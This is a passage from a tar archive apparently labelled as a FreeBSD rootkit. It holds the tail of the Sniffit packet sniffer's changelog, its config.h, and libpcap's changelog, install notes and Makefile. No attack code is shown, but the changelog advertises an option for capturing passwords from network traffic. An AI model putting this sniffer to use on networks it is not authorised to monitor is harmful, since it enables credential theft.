output format (SINCE 0.3.0) - a wildcard bug - a Makefile bug (nothing important) (SINCE 0.3.1) - a typo caused the screwing up of the wildcard option (0.3.1) - 'select from host' didn't work... (SINCE 0.3.2) - a functions that had a parameter missing. - all interactive mode problems. 7. NEW STUFF ------------ V.0.1.0 - First test of the ncurses interface (never use this version, it's megaslow) V.0.1.1 - Added '-x' for extra information on TCP packets - Added '-A ' for you 'password-horny-dudes' ;) - beginning of ICMP support ('-P ') - First 'real' test for the interface V.0.1.2 - IP debugging info - UDP support - extended ICMP info (almost complete....) - logging on another terminal V.0.2.0 - SUN port (I now hate SPARC's ;) V.0.2.1 - SGI port V.0.2.2 - Netload statistics (interactive part) - Massive debugging of interactive part V.0.3.0 - Wildcards in non-interactive mode - time-out in non interactive mode, so you won't stuff memory by connections that weren't closed like they're supposed to be. - Forcing the use of a snif device - MTU changeble in config.h - ppp use V.0.3.1 - Flexible network trafic selection with config file. V.0.3.2 - IP checksum check - First introduction of a logfile for monitoring - Adding of loglevel: 1, 10, 12 V.0.3.3 - rewrite of some parts (big clean-up of interactive part) - Auto adjusting to screen of interface - Starting of external programs from interface ------------------------ Thx for using Sniffit(tm) --------------------------- fbsdrootkit-1.2/sniffit.0.3.3/config.h100600 764 764 6013 6226213207 14653 0ustar dfdf/* Sniffit Config File -- Brecht Claerhout */ /* if this variable is defined, the '-i' will be available, if not, it */ /* won't be available. */ /* If you don't need interactive sniffing (like logging when not there) */ /* compile it with this value #undef, this will make the program over 3 */ /* times smaller and it doesn't allocate all that memory. */ /* If you 'define' INCLUDE_INTERFACE, your kernel should support */ /* System V IPC (it probably does) */ #ifdef LINUX /* if you undef INCLUDE INTERFACE, don't forget to adjust the Makefile! */ /* information is in that file! */ #define INCLUDE_INTERFACE /*#undef INCLUDE_INTERFACE */ #endif #ifdef SUNOS /* if you undef INCLUDE INTERFACE, don't forget to adjust the Makefile! */ #define INCLUDE_INTERFACE /*#undef INCLUDE_INTERFACE */ #endif #ifdef FREEBSD /* if you undef INCLUDE INTERFACE, don't forget to adjust the Makefile! */ /* information is in that file! */ #define INCLUDE_INTERFACE /*#undef INCLUDE_INTERFACE */ #endif #ifdef IRIX #undef INCLUDE_INTERFACE #endif /* Not supported yet */ #ifdef BSDI #undef INCLUDE_INTERFACE #endif /* If you don't have the atexit() function, you will probably have on_exit */ /* so remove the atexit line and uncomment the on_exit line. */ #define exit_func(x) atexit(x) /* #define exit_func(x) on_exit (x,0) */ /* Following parameters describe the connections that can be handled at */ /* once, MAXCOUNT stands for connections handled in normal mode. As */ /* memory in normal mode is now handled dynamically, you can pump this */ /* number up without having to much trouble (Watch it, the machine */ /* could be slowed down a lot, and packets could get missed) */ /* CONNECTION_CAPACITY is the same, except in interactive mode, this is */ /* more dangerous to change, if you machine goes to slow (when sniffing */ /* in interactive mode), lower this number. */ #define MAXCOUNT 100 #ifdef INCLUDE_INTERFACE #define CONNECTION_CAPACITY 50 #endif /* This is the interval time for the netstatistics */ #define INFO_TIMER 3 /* In seconds */ /* Read about forcing the sniff device in the README.FIRST file */ #define FORCED_HEAD_LENGTH ETHERHEAD /* MTU: this could need a change on interfaces different from ethernet or on non-standard */ /* configured systems. Get the info out of 'ifconfig'. */ /* But 1500 is a standard. */ #define MTU 1500 /*************** Don't change anything below this line *********************/ #undef DEBUG /* Debugging (to tty) - sigh */ /* #define DEBUG */ #define DEBUG_DEVICE "/dev/tty9" #undef DEBUG_ONSCREEN /* Debugging (to screen) - sigh */ /*#define DEBUG_ONSCREEN */ fbsdrootkit-1.2/sniffit.0.3.3/libpcap/ 40700 764 764 0 6257600151 14552 5ustar dfdffbsdrootkit-1.2/sniffit.0.3.3/libpcap/CHANGES100600 764 764 4245 6226213207 15647 0ustar dfdf@(#) $Header: CHANGES,v 1.4+ 94/06/20 19:22:33 leres Exp $ (LBL) v0.0.6 Fri Apr 28 04:07:13 PDT 1995 - Add missing variable declaration missing from 0.0.6 v0.0.5 Fri Apr 28 00:22:21 PDT 1995 - Workaround for problems when pcap_read() returns 0 due to the timeout expiring. v0.0.4 Thu Apr 20 20:41:48 PDT 1995 - Change configuration to not use gcc v2 flags with gcc v1. - Fixed a bug in pcap_next(); if pcap_dispatch() returns 0, pcap_next() should also return 0. Thanks to Richard Stevens (rstevens@noao.edu). - Fixed configure to test for snoop before dlpi to avoid problems under IRIX 5. Thanks to J. Eric Townsend (jet@abulafia.genmagic.com). - Hack around deficiency in Ultrix's make. - Fix two bugs related to the Solaris pre-5.3.2 bufmod bug; handle savefiles that have more than snapshot bytes of data in them (so we can read old savefiles) and avoid writing such files. v0.0.3 Tue Oct 18 18:13:46 PDT 1994 - Fixed configure to test for snoop before dlpi to avoid problems under IRIX 5. Thanks to J. Eric Townsend (jet@abulafia.genmagic.com). v0.0.2 Wed Oct 12 20:56:37 PDT 1994 - Implement timeout in the dlpi pcap_open_live(). Thanks to Richard Stevens. - Determine pcap link type from dlpi media type. Resulted from report by Mahesh Jethanandani (mahesh@npix.com). v0.0.1 Fri Jun 24 14:50:57 PDT 1994 - Fixed bug in nit_setflags() in pcap-snit.c. The streams ioctl timeout wasn't being initialized sometimes resulting in an "NIOCSFLAGS: Invalid argument" error under OSF/1. Reported by Matt Day (mday@artisoft.com) and Danny Mitzel (dmitzel@whitney.hitc.com). - Turn on FDDI support by default. v0.0 Mon Jun 20 19:20:16 PDT 1994 - Initial release. - Fixed bug with greater/less keywords, reported by Mark Andrews (mandrews@alias.com). - Fix bug where '|' was defined as BPF_AND instead of BPF_OR, reported by Elan Amir (elan@leeb.cs.berkeley.edu). - Machines with little-endian byte ordering are supported thanks to Jeff Mogul. - Add hack for version 2.3 savefiles which don't have caplen and len swapped thanks to Vern Paxson. - Added "&&" and "||" aliases for "and" and "or" thanks to Vern Paxson. - Added length, inbound and outbound keywords. fbsdrootkit-1.2/sniffit.0.3.3/libpcap/INSTALL100600 764 764 11704 6226213207 15723 0ustar dfdf@(#) $Header: INSTALL,v 1.5+ 94/06/20 18:56:52 leres Exp $ (LBL) To build libpcap, first customize any paths in Makefile.in, then run ./configure (a shell script). "configure" will determine your system attributes and generate an appropriate Makefile from Makefile.in. Next run "make", and if everything goes well, su and run "make install". (If you're system is not listed in the README as one which we have tested, you may have to modify the configure script and Makefile.in; please send us patches for any modifications you need to make.) You need not install libpcap if you just want to build tcpdump (but make sure tcpdump and libpcap have the same parent directory during the build). You will need an ANSI C compiler to build libpcap. If your compiler is not ANSI compliant, use the GNU C compiler, available via anonymous ftp: ftp://prep.ai.mit.edu/pub/gnu/gcc-*.tar.gz If you do use gcc, you must run the "fixincludes" script. The configure script automatically detects this possible configuration problem. If you use flex, version 2.4.6 or higher is recommended. The current version of flex is available via anonymous ftp: ftp://ftp.ee.lbl.gov/flex-*.tar.Z Earlier versions of 2.4 require declarations for some internal memory allocator routines. Version 2.3 and earlier caused typedef conflicts with sys/types.h. If you don't have a version of flex that works, plain old lex works ok. But if you use lex/yacc, libpcap will have symbols that will conflict with other yacc/lex generated code (yes, this can be fixed with a script that maps the yy* identifiers, but flex and bison do this automatically so we haven't bothered). Note that the stock version of flex under DEC OSF/1 is 2.3. If you use Solaris, there is a bug with bufmod(7) that is supposed to be fixed in 5.3.2. Setting a snapshot length with the broken bufmod(7) results in data be truncated from the FRONT of the packet instead of the end. The work around is to not set a snapshot length but this results in performance problems since the entire packet is copied to user space. There is a patch available from Sun; ask for bugid 1149065. After installing the patch, use "setenv BUFMOD_FIXED" to enable use of bufmod(7). If linking tcpdump fails with "Undefined: _alloca" when using bison on a Sun4, your version of bison is broken. In any case version 1.16 or higher is recommended (1.14 is known to cause problems 1.16 is known to work). Either pick up a current version from: ftp://prep.ai.mit.edu/pub/gnu/bison-*.tar.gz or hack around it by inserting the lines: #ifdef __GNUC__ #define alloca __builtin_alloca #else #ifdef sparc #include #else char *alloca (); #endif #endif right after the (100 line!) GNU license comment in bison.simple, remove grammar.[co] and fire up make again. If you are running a version of SunOS earlier than 4.1, you will need to replace the Sun supplied /sys/sun{3,4,4c}/OBJ/nit_if.o with the appropriate version from this distribution's SUNOS4 subdirectory and build a new kernel: nit_if.o.sun3-sunos4 (any flavor of sun3) nit_if.o.sun4c-sunos4.0.3c (SS1, SS1+, IPC, SLC, etc.) nit_if.o.sun4-sunos4 (Sun4's not covered by nit_if.o.sun4c-sunos4.0.3c) These nit replacements fix a bug that makes nit essentially unusable in pre-SunOS 4.1. In addition, our sun4c-sunos4.0.3c nit gives you timestamps to the resolution of the SS-1 clock (1 us) rather than the lousy 20ms timestamps Sun gives you (tcpdump will print out the full timestamp resolution if it finds it's running on a SS-1). FILES ----- CHANGES - description of differences between releases INSTALL - this file Makefile.in - compilation rules (input to the configure script) README - description of distribution RUNSON - list of supported hardware and operating systems VERSION - version of this release bpf/net - copies of bpf_filter.c and bpf.h bpf_image.c - BPF disassembly routine checkioctl.c - gcc test program configure - configure script (run this first) etherent.c - /etc/ethers support routines ethertype.h - ethernet protocol types and names definitions gencode.c - BPF code generation routines gencode.h - BPF code generation definitions grammar.y - filter string grammar inet.c - network routines mkdep - construct Makefile dependency list nametoaddr.c - hostname to address routines net - symlink to bpf/net optimize.c - BPF optimization routines pcap-bpf.c - BSD Packet Filter support pcap-dlpi.c - Data Link Provider Interface support pcap-enet.c - enet support pcap-int.h - internal libpcap definitions pcap-namedb.h - public libpcap name database definitions pcap-nit.c - Network Interface Tap support pcap-nit.h - Network Interface Tap definitions pcap-pf.c - Packet Filter support pcap-pf.h - Packet Filter definitions pcap-snit.c - Streams based Network Interface Tap support pcap-snoop.c - Snoop network monitoring support pcap.3 - manual entry pcap.c - pcap utility routines pcap.h - public libpcap definitions savefile.c - offline support scanner.l - filter string scanner fbsdrootkit-1.2/sniffit.0.3.3/libpcap/Makefile100600 764 764 44350 6226213207 16335 0ustar dfdf# Copyright (c) 1993, 1994, 1995 # The Regents of the University of California. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that: (1) source code distributions # retain the above copyright notice and this paragraph in its entirety, (2) # distributions including binary code include the above copyright notice and # this paragraph in its entirety in the documentation or other materials # provided with the distribution, and (3) all advertising materials mentioning # features or use of this software display the following acknowledgement: # ``This product includes software developed by the University of California, # Lawrence Berkeley Laboratory and its contributors.'' Neither the name of # the University nor the names of its contributors may be used to endorse # or promote products derived from this software without specific prior # written permission. # THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED # WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. # # @(#) $Header: Makefile.in,v 1.37+ 94/06/25 14:53:47 leres Exp $ (LBL) # # Various configurable paths # # where the installed pcap files go INCL_DIR = /usr/local/include # where libpcap.a should go LIB_DIR = /usr/local/lib # where man page should go MAN_DIR = /usr/local/man # # Owner of installed files # BIN_GRP = bin BIN_OWN = bin # # You shouldn't need to edit anything below. # #have-ethers#ETHERS_DEFINES = -DETHER_SERVICE #have-sunos5#OS_DEFINES = -DSOLARIS DEFINE_STDC = -D__STDC__ #have-gcc#DEFINE_STDC = #have-irix4#OS_DEFINES = -Dvolatile= $(DEFINE_STDC) #have-irix5#OS_DEFINES = -Dvolatile= $(DEFINE_STDC) #have-pf#PCAP_DEFINES = -DPCAP_PF #have-bpf#PCAP = bpf #have-dlpi#PCAP = dlpi #have-nit#PCAP = nit #have-pf#PCAP = pf #have-snit#PCAP = snit #have-snoop#PCAP = snoop PCAP = linux CCOPT = -O INCLUDES = -I. INCLUDES = -I. -Ilinux-include DEFINES = -DFDDI $(ETHERS_DEFINES) $(PCAP_DEFINES) $(OS_DEFINES) # Standard CFLAGS CFLAGS = $(CCOPT) $(DEFINES) $(INCLUDES) # Standard C compiler CC = cc GCC_FLAGS = -Wmissing-prototypes -Wstrict-prototypes #have-gcc1#GCC_FLAGS = #have-gcc#CC = gcc -g -Wall $(GCC_FLAGS) # # Flex and bison allow you to specify the prefixes of the global symbols # used by the generated parser. This allows programs to use lex/yacc # and link against libpcap. If you don't have flex or bison, get them. # LEX = lex YACC = yacc #have-flex#LEX = flex -Ppcap_ #have-bison#YACC = bison -y -p pcap_ MAKE = make SHELL = /bin/sh RANLIB = true RANLIB = ranlib # Explicitly define compiliation rule since SunOS 4's make doesn't like gcc. # Also, gcc does not remove the .o before forking 'as', which can be a # problem if you don't own the file but can write to the directory. .c.o: rm -f $@; $(CC) $(CFLAGS) -c $*.c PCAPSRC = \ pcap-$(PCAP).c CSRC = pcap.c inet.c gencode.c optimize.c nametoaddr.c etherent.c savefile.c \ bpf_filter.c bpf_image.c LSRC = scanner.l YSRC = grammar.y GENSRC = \ $(LSRC:.l=.c) $(YSRC:.y=.c) SRC = $(PCAPSRC) $(CSRC) $(GENSRC) ALLSRC = \ pcap-bpf.c pcap-dlpi.c pcap-enet.c pcap-nit.c pcap-pf.c \ pcap-snit.c pcap-snoop.c \ $(CSRC) checkioctl.c $(LSRC) $(YSRC) OBJ = $(SRC:.c=.o) # Some makes can't handle the above substitution #have-broken-make#OBJ = pcap-$(PCAP).o \ #have-broken-make# pcap.o inet.o gencode.o optimize.o nametoaddr.o \ #have-broken-make# etherent.o savefile.o bpf_filter.o bpf_image.o \ #have-broken-make# scanner.o grammar.o HDR = pcap.h pcap-int.h pcap-namedb.h pcap-nit.h pcap-pf.h \ ethertype.h gencode.h GENHDR = \ tokdefs.h TAGFILES = \ $(SRC) $(HDR) TARFILES = \ README CHANGES INSTALL VERSION Makefile.in pcap.3 mkdep \ $(ALLSRC) $(HDR) \ net bpf/net/bpf_filter.c bpf/net/bpf.h SUNOS4 configure CLEANFILES = \ $(OBJ) libpcap.a checkioctl lex.yy.c $(GENSRC) $(GENHDR) libpcap.a: $(OBJ) rm -f libpcap.a ar rc $@ $(OBJ) $(RANLIB) $@ checkioctl: checkioctl.c rm -f $@; $(CC) $(CFLAGS) $@.c -o $@ scanner.c: scanner.l rm -f $@; $(LEX) -t $< > $$$$.$@; mv $$$$.$@ $@ scanner.o: scanner.c tokdefs.h rm -f $@; $(CC) $(CFLAGS) $(LEX_DEFINES) -c $*.c tokdefs.h: grammar.c grammar.c: grammar.y rm -f grammar.c tokdefs.h $(YACC) -d $< mv y.tab.c grammar.c mv y.tab.h tokdefs.h grammar.o: grammar.c $(CC) -c $(CFLAGS) -Dyylval=pcap_lval grammar.c install: force @for i in $(INCL_DIR) $(LIB_DIR) ; do \ if [ ! -d $$i ] ; then \ echo "mkdir $$i"; \ mkdir $$i; \ chmod 755 $$i; \ chown $(BIN_OWN) $$i; \ chgrp $(BIN_GRP) $$i; \ else \ true; \ fi; \ done cp libpcap.a $(LIB_DIR); \ chmod 444 $(LIB_DIR)/libpcap.a; \ chown $(BIN_OWN) $(LIB_DIR)/libpcap.a; \ chgrp $(BIN_GRP) $(LIB_DIR)/libpcap.a -$(RANLIB) $(LIB_DIR)/libpcap.a cp pcap.h pcap-namedb.h $(INCL_DIR); \ chmod 444 $(INCL_DIR)/pcap.h $(INCL_DIR)/pcap-namedb.h; \ chown $(BIN_OWN) $(INCL_DIR)/pcap.h $(INCL_DIR)/pcap-namedb.h; \ chgrp $(BIN_GRP) $(INCL_DIR)/pcap.h $(INCL_DIR)/pcap-namedb.h @if [ ! -f /usr/include/net/bpf.h ]; then \ i=$(INCL_DIR)/net; \ if [ ! -d $$i ] ; then \ echo "mkdir $$i"; \ mkdir $$i; \ chmod 755 $$i; \ chown $(BIN_OWN) $$i; \ chgrp $(BIN_GRP) $$i; \ else \ true; \ fi; \ set -x; \ cp net/bpf.h $(INCL_DIR)/net; \ chmod 444 $(INCL_DIR)/net/bpf.h; \ chown $(BIN_OWN) $(INCL_DIR)/net/bpf.h; \ chgrp $(BIN_GRP) $(INCL_DIR)/net/bpf.h; \ fi install-man: force @i=$(MAN_DIR)/man3; \ if [ ! -d $$i ] ; then \ echo "mkdir $$i"; \ mkdir $$i; \ chmod 755 $$i; \ chown $(BIN_OWN) $$i; \ chgrp $(BIN_GRP) $$i; \ else \ true; \ fi; \ cp pcap.3 $(MAN_DIR)/man3 chmod 444 $(MAN_DIR)/man3/pcap.3 chown $(BIN_OWN) $(MAN_DIR)/man3/pcap.3 chgrp $(BIN_GRP) $(MAN_DIR)/man3/pcap.3 clean: rm -f $(CLEANFILES) realclean: rm -f $(CLEANFILES) Makefile tags tags: $(TAGFILES) ctags -wtd $(TAGFILES) tar: force @cwd=`pwd` ; dir=`basename $$cwd` ; name=libpcap-`cat VERSION` ; \ list="" ; tar="tar cFFf" ; \ for i in $(TARFILES) ; do list="$$list $$name/$$i" ; done; \ echo \ "rm -f ../$$name; ln -s $$dir ../$$name" ; \ rm -f ../$$name; ln -s $$dir ../$$name ; \ echo \ "(cd .. ; $$tar - [lots of files]) | compress > /tmp/$$name.tar.Z" ; \ (cd .. ; $$tar - $$list) | compress > /tmp/$$name.tar.Z ; \ echo \ "rm -f ../$$name" ; \ rm -f ../$$name force: /tmp depend: $(GENSRC) force ./mkdep -c $(CC) $(DEFINES) $(INCLUDES) $(SRC) # DO NOT DELETE THIS LINE -- mkdep uses it. # DO NOT PUT ANYTHING AFTER THIS LINE, IT WILL GO AWAY. pcap-linux.o: pcap-linux.c /usr/include/sys/param.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/limits.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/syslimits.h \ /usr/include/limits.h /usr/include/features.h \ /usr/include/sys/cdefs.h /usr/include/posix1_lim.h \ /usr/include/linux/limits.h /usr/include/posix2_lim.h \ /usr/include/linux/param.h /usr/include/asm/param.h \ /usr/include/sys/types.h /usr/include/linux/types.h \ /usr/include/linux/posix_types.h /usr/include/asm/posix_types.h \ /usr/include/asm/types.h /usr/include/sys/bitypes.h \ /usr/include/stdio.h /usr/include/libio.h /usr/include/_G_config.h \ /usr/include/netdb.h /usr/include/paths.h /usr/include/ctype.h \ /usr/include/endian.h /usr/include/bytesex.h /usr/include/signal.h \ /usr/include/linux/signal.h /usr/include/asm/signal.h \ /usr/include/errno.h /usr/include/linux/errno.h \ /usr/include/asm/errno.h /usr/include/sys/time.h \ /usr/include/linux/time.h /usr/include/time.h \ /usr/include/sys/socket.h /usr/include/linux/socket.h \ /usr/include/asm/socket.h /usr/include/asm/sockios.h \ /usr/include/linux/sockios.h /usr/include/linux/uio.h \ /usr/include/sys/file.h /usr/include/fcntl.h /usr/include/gnu/types.h \ /usr/include/linux/fcntl.h /usr/include/asm/fcntl.h \ /usr/include/sys/ioctl.h /usr/include/linux/ioctl.h \ /usr/include/asm/ioctl.h /usr/include/termios.h \ /usr/include/linux/termios.h /usr/include/asm/termios.h \ /usr/include/asm/termbits.h /usr/include/asm/ioctls.h \ /usr/include/sys/socketio.h /usr/include/malloc.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/stddef.h \ /usr/include/memory.h /usr/include/string.h /usr/include/unistd.h \ /usr/include/posix_opt.h /usr/include/confname.h \ /usr/include/net/if.h /usr/include/linux/if.h \ /usr/include/net/if_arp.h /usr/include/linux/netdevice.h \ /usr/include/linux/config.h /usr/include/linux/autoconf.h \ /usr/include/linux/if_ether.h linux-include/linux/if_arp.h \ /usr/include/netinet/in.h /usr/include/linux/in.h \ /usr/include/asm/byteorder.h linux-include/netinet/in_systm.h \ linux-include/netinet/ip.h linux-include/netinet/ip_var.h \ linux-include/netinet/udp.h linux-include/netinet/tcp.h net/bpf.h \ pcap-int.h pcap.h pcap.o: pcap.c /usr/include/sys/types.h /usr/include/linux/types.h \ /usr/include/linux/posix_types.h /usr/include/asm/posix_types.h \ /usr/include/asm/types.h /usr/include/sys/bitypes.h \ /usr/include/unistd.h /usr/include/features.h \ /usr/include/sys/cdefs.h /usr/include/posix_opt.h \ /usr/include/gnu/types.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/stddef.h \ /usr/include/confname.h pcap-int.h pcap.h /usr/include/sys/time.h \ /usr/include/linux/time.h /usr/include/time.h net/bpf.h \ /usr/include/stdio.h /usr/include/libio.h /usr/include/_G_config.h inet.o: inet.c /usr/include/sys/param.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/limits.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/syslimits.h \ /usr/include/limits.h /usr/include/features.h \ /usr/include/sys/cdefs.h /usr/include/posix1_lim.h \ /usr/include/linux/limits.h /usr/include/posix2_lim.h \ /usr/include/linux/param.h /usr/include/asm/param.h \ /usr/include/sys/types.h /usr/include/linux/types.h \ /usr/include/linux/posix_types.h /usr/include/asm/posix_types.h \ /usr/include/asm/types.h /usr/include/sys/bitypes.h \ /usr/include/sys/file.h /usr/include/fcntl.h /usr/include/gnu/types.h \ /usr/include/linux/fcntl.h /usr/include/asm/fcntl.h \ /usr/include/sys/ioctl.h /usr/include/linux/ioctl.h \ /usr/include/asm/ioctl.h /usr/include/termios.h \ /usr/include/linux/termios.h /usr/include/asm/termios.h \ /usr/include/asm/termbits.h /usr/include/asm/ioctls.h \ /usr/include/sys/socketio.h /usr/include/linux/sockios.h \ /usr/include/asm/sockios.h /usr/include/sys/socket.h \ /usr/include/linux/socket.h /usr/include/asm/socket.h \ /usr/include/linux/uio.h /usr/include/net/if.h \ /usr/include/linux/if.h /usr/include/netinet/in.h \ /usr/include/linux/in.h /usr/include/asm/byteorder.h \ /usr/include/ctype.h /usr/include/endian.h /usr/include/bytesex.h \ /usr/include/errno.h /usr/include/linux/errno.h \ /usr/include/asm/errno.h /usr/include/stdio.h /usr/include/libio.h \ /usr/include/_G_config.h /usr/include/stdlib.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/stddef.h \ /usr/include/alloca.h /usr/include/string.h /usr/include/unistd.h \ /usr/include/posix_opt.h /usr/include/confname.h pcap.h \ /usr/include/sys/time.h /usr/include/linux/time.h /usr/include/time.h \ net/bpf.h gencode.o: gencode.c /usr/include/sys/types.h \ /usr/include/linux/types.h /usr/include/linux/posix_types.h \ /usr/include/asm/posix_types.h /usr/include/asm/types.h \ /usr/include/sys/bitypes.h /usr/include/sys/socket.h \ /usr/include/features.h /usr/include/sys/cdefs.h \ /usr/include/linux/socket.h /usr/include/asm/socket.h \ /usr/include/asm/sockios.h /usr/include/linux/sockios.h \ /usr/include/linux/uio.h /usr/include/sys/time.h \ /usr/include/linux/time.h /usr/include/time.h /usr/include/net/if.h \ /usr/include/linux/if.h net/bpf.h /usr/include/netinet/in.h \ /usr/include/linux/in.h /usr/include/asm/byteorder.h \ linux-include/netinet/if_ether.h /usr/include/net/if_arp.h \ /usr/include/linux/netdevice.h /usr/include/linux/config.h \ /usr/include/linux/autoconf.h /usr/include/linux/if_ether.h \ linux-include/linux/if_arp.h /usr/include/memory.h \ /usr/include/string.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/stddef.h pcap.h \ /usr/include/stdio.h /usr/include/libio.h /usr/include/_G_config.h \ pcap-namedb.h /usr/include/setjmp.h /usr/include/jmp_buf.h \ /usr/include/i386/jmp_buf.h /usr/include/signal.h \ /usr/include/linux/signal.h /usr/include/asm/signal.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/stdarg.h \ /usr/include/stdlib.h /usr/include/errno.h /usr/include/linux/errno.h \ /usr/include/asm/errno.h /usr/include/alloca.h gencode.h optimize.o: optimize.c /usr/include/sys/types.h \ /usr/include/linux/types.h /usr/include/linux/posix_types.h \ /usr/include/asm/posix_types.h /usr/include/asm/types.h \ /usr/include/sys/bitypes.h /usr/include/sys/time.h \ /usr/include/features.h /usr/include/sys/cdefs.h \ /usr/include/linux/time.h /usr/include/time.h net/bpf.h \ /usr/include/stdio.h /usr/include/libio.h /usr/include/_G_config.h \ /usr/include/memory.h /usr/include/string.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/stddef.h gencode.h nametoaddr.o: nametoaddr.c /usr/include/sys/param.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/limits.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/syslimits.h \ /usr/include/limits.h /usr/include/features.h \ /usr/include/sys/cdefs.h /usr/include/posix1_lim.h \ /usr/include/linux/limits.h /usr/include/posix2_lim.h \ /usr/include/linux/param.h /usr/include/asm/param.h \ /usr/include/sys/types.h /usr/include/linux/types.h \ /usr/include/linux/posix_types.h /usr/include/asm/posix_types.h \ /usr/include/asm/types.h /usr/include/sys/bitypes.h \ /usr/include/sys/socket.h /usr/include/linux/socket.h \ /usr/include/asm/socket.h /usr/include/asm/sockios.h \ /usr/include/linux/sockios.h /usr/include/linux/uio.h \ /usr/include/net/if.h /usr/include/linux/if.h \ /usr/include/netinet/in.h /usr/include/linux/in.h \ /usr/include/asm/byteorder.h linux-include/netinet/if_ether.h \ /usr/include/net/if_arp.h /usr/include/linux/netdevice.h \ /usr/include/linux/config.h /usr/include/linux/autoconf.h \ /usr/include/linux/if_ether.h linux-include/linux/if_arp.h \ /usr/include/arpa/inet.h /usr/include/ctype.h /usr/include/endian.h \ /usr/include/bytesex.h /usr/include/errno.h \ /usr/include/linux/errno.h /usr/include/asm/errno.h \ /usr/include/netdb.h /usr/include/paths.h pcap.h \ /usr/include/sys/time.h /usr/include/linux/time.h /usr/include/time.h \ net/bpf.h /usr/include/stdio.h /usr/include/libio.h \ /usr/include/_G_config.h pcap-namedb.h gencode.h ethertype.h etherent.o: etherent.c /usr/include/sys/types.h \ /usr/include/linux/types.h /usr/include/linux/posix_types.h \ /usr/include/asm/posix_types.h /usr/include/asm/types.h \ /usr/include/sys/bitypes.h /usr/include/ctype.h \ /usr/include/features.h /usr/include/sys/cdefs.h \ /usr/include/endian.h /usr/include/bytesex.h pcap.h \ /usr/include/sys/time.h /usr/include/linux/time.h /usr/include/time.h \ net/bpf.h /usr/include/stdio.h /usr/include/libio.h \ /usr/include/_G_config.h pcap-namedb.h savefile.o: savefile.c /usr/include/sys/types.h \ /usr/include/linux/types.h /usr/include/linux/posix_types.h \ /usr/include/asm/posix_types.h /usr/include/asm/types.h \ /usr/include/sys/bitypes.h /usr/include/sys/time.h \ /usr/include/features.h /usr/include/sys/cdefs.h \ /usr/include/linux/time.h /usr/include/time.h net/bpf.h \ /usr/include/errno.h /usr/include/linux/errno.h \ /usr/include/asm/errno.h /usr/include/memory.h /usr/include/string.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/stddef.h \ /usr/include/stdio.h /usr/include/libio.h /usr/include/_G_config.h \ /usr/include/stdlib.h /usr/include/alloca.h /usr/include/unistd.h \ /usr/include/posix_opt.h /usr/include/gnu/types.h \ /usr/include/confname.h pcap-int.h pcap.h bpf_filter.o: bpf_filter.c /usr/include/sys/param.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/limits.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/syslimits.h \ /usr/include/limits.h /usr/include/features.h \ /usr/include/sys/cdefs.h /usr/include/posix1_lim.h \ /usr/include/linux/limits.h /usr/include/posix2_lim.h \ /usr/include/linux/param.h /usr/include/asm/param.h \ /usr/include/sys/types.h /usr/include/linux/types.h \ /usr/include/linux/posix_types.h /usr/include/asm/posix_types.h \ /usr/include/asm/types.h /usr/include/sys/bitypes.h \ /usr/include/sys/time.h /usr/include/linux/time.h /usr/include/time.h \ net/bpf.h bpf_image.o: bpf_image.c /usr/include/sys/types.h \ /usr/include/linux/types.h /usr/include/linux/posix_types.h \ /usr/include/asm/posix_types.h /usr/include/asm/types.h \ /usr/include/sys/bitypes.h /usr/include/sys/time.h \ /usr/include/features.h /usr/include/sys/cdefs.h \ /usr/include/linux/time.h /usr/include/time.h net/bpf.h pcap.h \ /usr/include/stdio.h /usr/include/libio.h /usr/include/_G_config.h \ /usr/include/string.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/stddef.h scanner.o: scanner.c /usr/include/stdio.h /usr/include/features.h \ /usr/include/sys/cdefs.h /usr/include/libio.h \ /usr/include/_G_config.h /usr/include/sys/types.h \ /usr/include/linux/types.h /usr/include/linux/posix_types.h \ /usr/include/asm/posix_types.h /usr/include/asm/types.h \ /usr/include/sys/bitypes.h /usr/include/sys/time.h \ /usr/include/linux/time.h /usr/include/time.h /usr/include/ctype.h \ /usr/include/endian.h /usr/include/bytesex.h pcap.h net/bpf.h \ pcap-namedb.h gencode.h tokdefs.h /usr/include/stdlib.h \ /usr/lib/gcc-lib/i486-linux/2.7.2/include/stddef.h \ /usr/include/errno.h /usr/include/linux/errno.h \ /usr/include/asm/errno.h /usr/include/alloca.h grammar.o: grammar.c /usr/include/sys/types.h \ /usr/include/linux/types.h /usr/include/linux/posix_types.h \ /usr/include/asm/posix_types.h /usr/include/asm/types.h \ /usr/include/sys/bitypes.h /usr/include/sys/time.h \ /usr/include/features.h /usr/include/sys/cdefs.h \ /usr/include/linux/time.h /usr/include/time.h \ /usr/include/sys/socket.h /usr/include/linux/socket.h \ /usr/include/asm/socket.h /usr/include/asm/sockios.h \ /usr/include/linux/sockios.h /usr/include/linux/uio.h \ /usr/include/net/if.h /usr/include/linux/if.h net/bpf.h \ /usr/include/netinet/in.h /usr/include/linux/in.h \ /usr/include/asm/byteorder.h linux-include/netinet/if_ether.h \ /usr/include/net/if_arp.h /usr/include/linux/netdevice.h \ /usr/include/linux/config.h /usr/include/linux/autoconf.h \ /usr/include/linux/if_ether.h linux-include/linux/if_arp.h \ /usr/include/stdio.h /usr/include/libio.h /usr/include/_G_config.h \ pcap.h pcap-namedb.h gencode.h # IF YOU PUT ANYTHING HERE IT WILL GO AWAY fbsdrootkit-1.2/sniffit.0.3.3/libpcap/Makefile.in100600 764 764 14714 6226213210 16735 0ustar dfdf# Copyright (c) 1993, 1994, 1995 # The Regents of the University of California. All rights 